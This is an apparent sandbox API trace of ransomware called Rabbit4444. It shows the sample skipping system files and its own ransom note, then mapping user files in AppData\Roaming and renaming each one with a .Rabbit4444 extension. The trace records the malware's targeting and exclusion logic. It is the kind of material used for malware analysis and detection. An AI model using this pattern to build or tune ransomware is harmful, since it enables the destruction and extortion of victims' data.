[0050.351] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14166167103) returned 1 [0050.351] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8686) returned 1 [0050.351] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0050.351] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101958 [0050.351] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x24f0, lpName=0x0) returned 0x298 [0050.351] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x24f0) returned 0x70000 [0050.352] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.352] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0050.352] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.352] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0050.352] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.352] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0050.352] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.352] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0050.352] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14166336480) returned 1 [0050.353] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0050.353] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101958 | out: hHeap=0xe0000) returned 1 [0050.353] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.353] CloseHandle (hObject=0x298) returned 1 [0050.353] CloseHandle (hObject=0x278) returned 1 [0050.353] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\DcYe75yxfBjHF71TD.pptx.Rabbit4444") returned 65 [0050.353] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DcYe75yxfBjHF71TD.pptx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\dcye75yxfbjhf71td.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DcYe75yxfBjHF71TD.pptx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\dcye75yxfbjhf71td.pptx.rabbit4444"), dwFlags=0x1) returned 1 [0050.354] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b756c40, ftCreationTime.dwHighDateTime=0x1d4c832, ftLastAccessTime.dwLowDateTime=0x7e57b3d0, ftLastAccessTime.dwHighDateTime=0x1d4d176, ftLastWriteTime.dwLowDateTime=0x7e57b3d0, ftLastWriteTime.dwHighDateTime=0x1d4d176, nFileSizeHigh=0x0, nFileSizeLow=0x15d23, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EJrA1rdWo4.png", cAlternateFileName="EJRA1R~1.PNG")) returned 1 [0050.354] lstrcmpiW (lpString1="EJrA1rdWo4.png", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.354] lstrcmpiW (lpString1="EJrA1rdWo4.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.354] lstrcmpiW (lpString1="EJrA1rdWo4.png", lpString2="Rabbit4444.exe") returned -1 [0050.354] lstrcmpiW (lpString1="EJrA1rdWo4.png", lpString2=".") returned 1 [0050.354] lstrcmpiW (lpString1="EJrA1rdWo4.png", lpString2="..") returned 1 [0050.354] lstrcmpiW (lpString1="EJrA1rdWo4.png", lpString2="windows") returned -1 [0050.354] lstrcmpiW (lpString1="EJrA1rdWo4.png", lpString2="bootmgr") returned 1 [0050.354] lstrcmpiW (lpString1="EJrA1rdWo4.png", lpString2="pagefile.sys") returned -1 [0050.354] lstrcmpiW (lpString1="EJrA1rdWo4.png", lpString2="boot") returned 1 [0050.354] lstrcmpiW (lpString1="EJrA1rdWo4.png", lpString2="ids.txt") returned -1 [0050.354] lstrcmpiW (lpString1="EJrA1rdWo4.png", lpString2="NTUSER.DAT") returned -1 [0050.354] lstrcpyW (in: lpString1=0x130eb78, lpString2="EJrA1rdWo4.png" | out: lpString1="EJrA1rdWo4.png") returned="EJrA1rdWo4.png" [0050.354] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\EJrA1rdWo4.png", dwFileAttributes=0x0) returned 1 [0050.354] lstrlenW (lpString="EJrA1rdWo4.png") returned 14 [0050.354] lstrlenW (lpString="Rabbit4444") returned 10 [0050.355] lstrcmpiW (lpString1="1rdWo4.png", lpString2="Rabbit4444") returned -1 [0050.355] lstrlenW (lpString=".dll") returned 4 [0050.355] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0050.355] lstrlenW (lpString=".lnk") returned 4 [0050.355] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0050.355] lstrlenW (lpString=".ini") returned 4 [0050.355] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0050.355] lstrlenW (lpString=".sys") returned 4 [0050.355] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0050.355] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\EJrA1rdWo4.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ejra1rdwo4.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.355] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.355] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14166566339) returned 1 [0050.355] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=89379) returned 1 [0050.355] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0050.355] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0050.355] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16030, lpName=0x0) returned 0x298 [0050.355] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16030) returned 0x70000 [0050.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0050.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0050.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0050.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0050.358] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14166881902) returned 1 [0050.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0050.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0050.358] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.413] CloseHandle (hObject=0x298) returned 1 [0050.413] CloseHandle (hObject=0x278) returned 1 [0050.415] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\EJrA1rdWo4.png.Rabbit4444") returned 57 [0050.416] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\EJrA1rdWo4.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ejra1rdwo4.png"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\EJrA1rdWo4.png.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ejra1rdwo4.png.rabbit4444"), dwFlags=0x1) returned 1 [0050.416] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ebe0310, ftCreationTime.dwHighDateTime=0x1d4c779, ftLastAccessTime.dwLowDateTime=0xdb7d9390, ftLastAccessTime.dwHighDateTime=0x1d4cad2, ftLastWriteTime.dwLowDateTime=0xdb7d9390, ftLastWriteTime.dwHighDateTime=0x1d4cad2, nFileSizeHigh=0x0, nFileSizeLow=0x1488b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FqChn0.mkv", cAlternateFileName="")) returned 1 [0050.416] lstrcmpiW (lpString1="FqChn0.mkv", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.416] lstrcmpiW (lpString1="FqChn0.mkv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.416] lstrcmpiW (lpString1="FqChn0.mkv", lpString2="Rabbit4444.exe") returned -1 [0050.416] lstrcmpiW (lpString1="FqChn0.mkv", lpString2=".") returned 1 [0050.416] lstrcmpiW (lpString1="FqChn0.mkv", lpString2="..") returned 1 [0050.416] lstrcmpiW (lpString1="FqChn0.mkv", lpString2="windows") returned -1 [0050.416] lstrcmpiW (lpString1="FqChn0.mkv", lpString2="bootmgr") returned 1 [0050.416] lstrcmpiW (lpString1="FqChn0.mkv", lpString2="pagefile.sys") returned -1 [0050.416] lstrcmpiW (lpString1="FqChn0.mkv", lpString2="boot") returned 1 [0050.416] lstrcmpiW (lpString1="FqChn0.mkv", lpString2="ids.txt") returned -1 [0050.416] lstrcmpiW (lpString1="FqChn0.mkv", lpString2="NTUSER.DAT") returned -1 [0050.416] lstrcpyW (in: lpString1=0x130eb78, lpString2="FqChn0.mkv" | out: lpString1="FqChn0.mkv") returned="FqChn0.mkv" [0050.416] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\FqChn0.mkv", dwFileAttributes=0x0) returned 1 [0050.417] lstrlenW (lpString="FqChn0.mkv") returned 10 [0050.417] lstrlenW (lpString="Rabbit4444") returned 10 [0050.417] lstrcmpiW (lpString1="FqChn0.mkv", lpString2="Rabbit4444") returned -1 [0050.417] lstrlenW (lpString=".dll") returned 4 [0050.417] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0050.417] lstrlenW (lpString=".lnk") returned 4 [0050.417] lstrcmpiW (lpString1=".mkv", lpString2=".lnk") returned 1 [0050.417] lstrlenW (lpString=".ini") returned 4 [0050.417] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0050.417] lstrlenW (lpString=".sys") returned 4 [0050.417] lstrcmpiW (lpString1=".mkv", lpString2=".sys") returned -1 [0050.417] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\FqChn0.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\fqchn0.mkv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.417] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.417] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14172790571) returned 1 [0050.417] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=84107) returned 1 [0050.417] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0050.417] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1017c0 [0050.417] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14b90, lpName=0x0) returned 0x298 [0050.417] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14b90) returned 0x70000 [0050.419] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.419] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0050.420] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.420] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0050.420] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.420] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0050.420] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.420] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0050.420] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14173067081) returned 1 [0050.420] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0050.420] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1017c0 | out: hHeap=0xe0000) returned 1 [0050.420] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.421] CloseHandle (hObject=0x298) returned 1 [0050.421] CloseHandle (hObject=0x278) returned 1 [0050.422] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\FqChn0.mkv.Rabbit4444") returned 53 [0050.422] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\FqChn0.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\fqchn0.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\FqChn0.mkv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\fqchn0.mkv.rabbit4444"), dwFlags=0x1) returned 1 [0050.422] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c208530, ftCreationTime.dwHighDateTime=0x1d4c69e, ftLastAccessTime.dwLowDateTime=0x7e669e20, ftLastAccessTime.dwHighDateTime=0x1d4c845, ftLastWriteTime.dwLowDateTime=0x7e669e20, ftLastWriteTime.dwHighDateTime=0x1d4c845, nFileSizeHigh=0x0, nFileSizeLow=0x7c7f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GlZY7.mp3", cAlternateFileName="")) returned 1 [0050.422] lstrcmpiW (lpString1="GlZY7.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.422] lstrcmpiW (lpString1="GlZY7.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.422] lstrcmpiW (lpString1="GlZY7.mp3", lpString2="Rabbit4444.exe") returned -1 [0050.422] lstrcmpiW (lpString1="GlZY7.mp3", lpString2=".") returned 1 [0050.422] lstrcmpiW (lpString1="GlZY7.mp3", lpString2="..") returned 1 [0050.422] lstrcmpiW (lpString1="GlZY7.mp3", lpString2="windows") returned -1 [0050.422] lstrcmpiW (lpString1="GlZY7.mp3", lpString2="bootmgr") returned 1 [0050.422] lstrcmpiW (lpString1="GlZY7.mp3", lpString2="pagefile.sys") returned -1 [0050.422] lstrcmpiW (lpString1="GlZY7.mp3", lpString2="boot") returned 1 [0050.422] lstrcmpiW (lpString1="GlZY7.mp3", lpString2="ids.txt") returned -1 [0050.422] lstrcmpiW (lpString1="GlZY7.mp3", lpString2="NTUSER.DAT") returned -1 [0050.422] lstrcpyW (in: lpString1=0x130eb78, lpString2="GlZY7.mp3" | out: lpString1="GlZY7.mp3") returned="GlZY7.mp3" [0050.422] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\GlZY7.mp3", dwFileAttributes=0x0) returned 1 [0050.423] lstrlenW (lpString="GlZY7.mp3") returned 9 [0050.423] lstrlenW (lpString="Rabbit4444") returned 10 [0050.423] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0050.423] lstrlenW (lpString=".dll") returned 4 [0050.423] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0050.423] lstrlenW (lpString=".lnk") returned 4 [0050.423] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0050.423] lstrlenW (lpString=".ini") returned 4 [0050.423] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0050.423] lstrlenW (lpString=".sys") returned 4 [0050.423] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0050.423] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\GlZY7.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\glzy7.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.423] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.423] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14173385191) returned 1 [0050.423] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=31871) returned 1 [0050.423] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0050.423] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0050.423] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f80, lpName=0x0) returned 0x298 [0050.423] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f80) returned 0x70000 [0050.424] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.424] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0050.424] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.424] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0050.424] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.425] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0050.425] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.425] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0050.425] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14173552780) returned 1 [0050.425] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0050.425] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0050.425] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.425] CloseHandle (hObject=0x298) returned 1 [0050.425] CloseHandle (hObject=0x278) returned 1 [0050.426] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\GlZY7.mp3.Rabbit4444") returned 52 [0050.426] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\GlZY7.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\glzy7.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\GlZY7.mp3.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\glzy7.mp3.rabbit4444"), dwFlags=0x1) returned 1 [0050.426] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad5580a0, ftCreationTime.dwHighDateTime=0x1d4d29c, ftLastAccessTime.dwLowDateTime=0x2b3a0530, ftLastAccessTime.dwHighDateTime=0x1d4cc36, ftLastWriteTime.dwLowDateTime=0x2b3a0530, ftLastWriteTime.dwHighDateTime=0x1d4cc36, nFileSizeHigh=0x0, nFileSizeLow=0xa2b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hWfeMbbEV8M9x35_Hd8.png", cAlternateFileName="HWFEMB~1.PNG")) returned 1 [0050.426] lstrcmpiW (lpString1="hWfeMbbEV8M9x35_Hd8.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.426] lstrcmpiW (lpString1="hWfeMbbEV8M9x35_Hd8.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.426] lstrcmpiW (lpString1="hWfeMbbEV8M9x35_Hd8.png", lpString2="Rabbit4444.exe") returned -1 [0050.426] lstrcmpiW (lpString1="hWfeMbbEV8M9x35_Hd8.png", lpString2=".") returned 1 [0050.426] lstrcmpiW (lpString1="hWfeMbbEV8M9x35_Hd8.png", lpString2="..") returned 1 [0050.426] lstrcmpiW (lpString1="hWfeMbbEV8M9x35_Hd8.png", lpString2="windows") returned -1 [0050.426] lstrcmpiW (lpString1="hWfeMbbEV8M9x35_Hd8.png", lpString2="bootmgr") returned 1 [0050.426] lstrcmpiW (lpString1="hWfeMbbEV8M9x35_Hd8.png", lpString2="pagefile.sys") returned -1 [0050.427] lstrcmpiW (lpString1="hWfeMbbEV8M9x35_Hd8.png", lpString2="boot") returned 1 [0050.427] lstrcmpiW (lpString1="hWfeMbbEV8M9x35_Hd8.png", lpString2="ids.txt") returned -1 [0050.427] lstrcmpiW (lpString1="hWfeMbbEV8M9x35_Hd8.png", lpString2="NTUSER.DAT") returned -1 [0050.427] lstrcpyW (in: lpString1=0x130eb78, lpString2="hWfeMbbEV8M9x35_Hd8.png" | out: lpString1="hWfeMbbEV8M9x35_Hd8.png") returned="hWfeMbbEV8M9x35_Hd8.png" [0050.427] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\hWfeMbbEV8M9x35_Hd8.png", dwFileAttributes=0x0) returned 1 [0050.427] lstrlenW (lpString="hWfeMbbEV8M9x35_Hd8.png") returned 23 [0050.427] lstrlenW (lpString="Rabbit4444") returned 10 [0050.427] lstrcmpiW (lpString1="35_Hd8.png", lpString2="Rabbit4444") returned -1 [0050.427] lstrlenW (lpString=".dll") returned 4 [0050.427] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0050.427] lstrlenW (lpString=".lnk") returned 4 [0050.427] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0050.427] lstrlenW (lpString=".ini") returned 4 [0050.427] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0050.427] lstrlenW (lpString=".sys") returned 4 [0050.427] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0050.427] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\hWfeMbbEV8M9x35_Hd8.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\hwfembbev8m9x35_hd8.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.427] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.427] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14173852968) returned 1 [0050.428] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=41654) returned 1 [0050.428] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0050.428] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0050.428] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa5c0, lpName=0x0) returned 0x298 [0050.428] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa5c0) returned 0x70000 [0050.429] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.429] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0050.429] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.429] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0050.429] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.430] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0050.430] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.430] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0050.430] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14174044093) returned 1 [0050.430] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0050.430] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0050.430] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.430] CloseHandle (hObject=0x298) returned 1 [0050.430] CloseHandle (hObject=0x278) returned 1 [0050.431] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\hWfeMbbEV8M9x35_Hd8.png.Rabbit4444") returned 66 [0050.431] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\hWfeMbbEV8M9x35_Hd8.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\hwfembbev8m9x35_hd8.png"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\hWfeMbbEV8M9x35_Hd8.png.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\hwfembbev8m9x35_hd8.png.rabbit4444"), dwFlags=0x1) returned 1 [0050.431] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eda57b0, ftCreationTime.dwHighDateTime=0x1d4d59d, ftLastAccessTime.dwLowDateTime=0x17e32c80, ftLastAccessTime.dwHighDateTime=0x1d4d377, ftLastWriteTime.dwLowDateTime=0x17e32c80, ftLastWriteTime.dwHighDateTime=0x1d4d377, nFileSizeHigh=0x0, nFileSizeLow=0x1051e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J9xGx_zgbd5MhMcXW.ods", cAlternateFileName="J9XGX_~1.ODS")) returned 1 [0050.431] lstrcmpiW (lpString1="J9xGx_zgbd5MhMcXW.ods", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.432] lstrcmpiW (lpString1="J9xGx_zgbd5MhMcXW.ods", lpString2=".BFC0E91B00AE8A0620D3") returned 